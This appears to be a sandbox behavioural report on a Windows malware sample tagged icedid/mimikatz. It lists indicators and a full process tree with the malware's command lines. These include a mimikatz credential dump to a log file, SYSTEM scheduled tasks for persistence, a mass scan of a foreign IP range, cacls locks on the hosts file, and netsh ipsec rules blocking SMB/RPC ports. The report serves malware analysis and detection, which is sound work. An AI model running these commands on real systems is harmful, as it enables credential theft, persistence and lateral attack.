\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vvbrngnms.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ucdremr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bgvdci.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 436 cmd.exe 4460 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023c62-6.dat nsis_installer_2 behavioral2/files/0x000b0000000006d1-14.dat nsis_installer_1 behavioral2/files/0x000b0000000006d1-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 39 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ucdremr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ucdremr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ucdremr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ucdremr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ucdremr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ucdremr.exe Key created \REGISTRY\USER\.DEFAULT\Software htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing htmcbbltr.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ ucdremr.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4460 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1084 schtasks.exe 2660 schtasks.exe 672 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1728 2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 1728 2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2660 ucdremr.exe Token: SeDebugPrivilege 1260 ucdremr.exe Token: SeDebugPrivilege 5000 vfshost.exe Token: SeDebugPrivilege 3076 htmcbbltr.exe Token: SeLockMemoryPrivilege 3320 vktncb.exe Token: SeLockMemoryPrivilege 3320 vktncb.exe Token: SeDebugPrivilege 2404 htmcbbltr.exe Token: SeDebugPrivilege 4676 htmcbbltr.exe Token: SeDebugPrivilege 2248 htmcbbltr.exe Token: SeDebugPrivilege 2712 htmcbbltr.exe Token: SeDebugPrivilege 5044 htmcbbltr.exe Token: SeDebugPrivilege 2436 htmcbbltr.exe Token: SeDebugPrivilege 1020 htmcbbltr.exe Token: SeDebugPrivilege 2072 htmcbbltr.exe Token: SeDebugPrivilege 4416 htmcbbltr.exe Token: SeDebugPrivilege 2356 htmcbbltr.exe Token: SeDebugPrivilege 3748 htmcbbltr.exe Token: SeDebugPrivilege 2680 htmcbbltr.exe Token: SeDebugPrivilege 216 htmcbbltr.exe Token: SeDebugPrivilege 2428 htmcbbltr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1728 2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe 1728 2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe 2660 ucdremr.exe 2660 ucdremr.exe 1260 ucdremr.exe 1260 ucdremr.exe 852 xohudmc.exe 3460 bgvdci.exe 4780 ucdremr.exe 4780 ucdremr.exe 5256 ucdremr.exe 5256 ucdremr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1728 wrote to memory of 436 1728 2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe 83 PID 1728 wrote to memory of 436 1728 2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe 83 PID 1728 wrote to memory of 436 1728 2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe 83 PID 436 wrote to memory of 4460 436 cmd.exe 85 PID 436 wrote to memory of 4460 436 cmd.exe 85 PID 436 wrote to memory of 4460 436 cmd.exe 85 PID 436 wrote to memory of 2660 436 cmd.exe 87 PID 436 wrote to memory of 2660 436 cmd.exe 87 PID 436 wrote to memory of 2660 436 cmd.exe 87 PID 1260 wrote to memory of 1280 1260 ucdremr.exe 89 PID 1260 wrote to memory of 1280 1260 ucdremr.exe 89 PID 1260 wrote to memory of 1280 1260 ucdremr.exe 89 PID 1280 wrote to memory of 3220 1280 cmd.exe 91 PID 1280 wrote to memory of 3220 1280 cmd.exe 91 PID 1280 wrote to memory of 3220 1280 cmd.exe 91 PID 1280 wrote to memory of 3148 1280 cmd.exe 92 PID 1280 wrote to memory of 3148 1280 cmd.exe 92 PID 1280 wrote to memory of 3148 1280 cmd.exe 92 PID 1280 wrote to memory of 8 1280 cmd.exe 93 PID 1280 wrote to memory of 8 1280 cmd.exe 93 PID 1280 wrote to memory of 8 1280 cmd.exe 93 PID 1280 wrote to memory of 952 1280 cmd.exe 94 PID 1280 wrote to memory of 952 1280 cmd.exe 94 PID 1280 wrote to memory of 952 1280 cmd.exe 94 PID 1280 wrote to memory of 1436 1280 cmd.exe 95 PID 1280 wrote to memory of 1436 1280 cmd.exe 95 PID 1280 wrote to memory of 1436 1280 cmd.exe 95 PID 1280 wrote to memory of 2636 1280 cmd.exe 96 PID 1280 wrote to memory of 2636 1280 cmd.exe 96 PID 1280 wrote to memory of 2636 1280 cmd.exe 96 PID 1260 wrote to memory of 3236 1260 ucdremr.exe 98 PID 1260 wrote to memory of 3236 1260 ucdremr.exe 98 PID 1260 wrote to memory of 3236 1260 ucdremr.exe 98 PID 1260 wrote to memory of 3724 1260 ucdremr.exe 100 PID 1260 wrote to memory of 3724 1260 ucdremr.exe 100 PID 1260 wrote to memory of 3724 1260 ucdremr.exe 100 PID 1260 wrote to memory of 2624 1260 ucdremr.exe 102 PID 1260 wrote to memory of 2624 1260 ucdremr.exe 102 PID 1260 wrote to memory of 2624 1260 ucdremr.exe 102 PID 1260 wrote to memory of 4916 1260 ucdremr.exe 104 PID 1260 wrote to memory of 4916 1260 ucdremr.exe 104 PID 1260 wrote to memory of 4916 1260 ucdremr.exe 104 PID 4916 wrote to memory of 824 4916 cmd.exe 106 PID 4916 wrote to memory of 824 4916 cmd.exe 106 PID 4916 wrote to memory of 824 4916 cmd.exe 106 PID 824 wrote to memory of 1444 824 wpcap.exe 107 PID 824 wrote to memory of 1444 824 wpcap.exe 107 PID 824 wrote to memory of 1444 824 wpcap.exe 107 PID 1444 wrote to memory of 3836 1444 net.exe 109 PID 1444 wrote to memory of 3836 1444 net.exe 109 PID 1444 wrote to memory of 3836 1444 net.exe 109 PID 824 wrote to memory of 3732 824 wpcap.exe 110 PID 824 wrote to memory of 3732 824 wpcap.exe 110 PID 824 wrote to memory of 3732 824 wpcap.exe 110 PID 3732 wrote to memory of 3564 3732 net.exe 112 PID 3732 wrote to memory of 3564 3732 net.exe 112 PID 3732 wrote to memory of 3564 3732 net.exe 112 PID 824 wrote to memory of 4236 824 wpcap.exe 113 PID 824 wrote to memory of 4236 824 wpcap.exe 113 PID 824 wrote to memory of 4236 824 wpcap.exe 113 PID 4236 wrote to memory of 1028 4236 net.exe 115 PID 4236 wrote to memory of 1028 4236 net.exe 115 PID 4236 wrote to memory of 1028 4236 net.exe 115 PID 824 wrote to memory of 1848 824 wpcap.exe 116
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2060
-
C:\Windows\TEMP\stfvitvtn\vktncb.exe"C:\Windows\TEMP\stfvitvtn\vktncb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
C:\Users\Admin\AppData\Local\Temp\2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\yjyimgrn\ucdremr.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4460
-
-
C:\Windows\yjyimgrn\ucdremr.exeC:\Windows\yjyimgrn\ucdremr.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2660
-
-
-
C:\Windows\yjyimgrn\ucdremr.exeC:\Windows\yjyimgrn\ucdremr.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3220
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:3148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:8
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1436
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2636
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3236
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3724
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2624
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rbqcumykk\ctftbtnzv\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\rbqcumykk\ctftbtnzv\wpcap.exeC:\Windows\rbqcumykk\ctftbtnzv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3836
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3564
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:1028
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:1848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:1336
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3080 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1688 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2904
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1340 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4768
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:212
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rbqcumykk\ctftbtnzv\kjezifarc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\rbqcumykk\ctftbtnzv\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4324 -
C:\Windows\rbqcumykk\ctftbtnzv\kjezifarc.exeC:\Windows\rbqcumykk\ctftbtnzv\kjezifarc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\rbqcumykk\ctftbtnzv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rbqcumykk\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\rbqcumykk\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:3056 -
C:\Windows\rbqcumykk\Corporate\vfshost.exeC:\Windows\rbqcumykk\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tccekrbmv" /ru system /tr "cmd /c C:\Windows\ime\ucdremr.exe"2⤵PID:2632
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tccekrbmv" /ru system /tr "cmd /c C:\Windows\ime\ucdremr.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rjdrnginb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yjyimgrn\ucdremr.exe /p everyone:F"2⤵PID:2880
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rjdrnginb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yjyimgrn\ucdremr.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nbltcmccc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stfvitvtn\vktncb.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2932 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nbltcmccc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stfvitvtn\vktncb.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:672
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2244
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2636
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3144
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3260
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2620
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3724
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4616
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3984
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4420
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:216
-
-
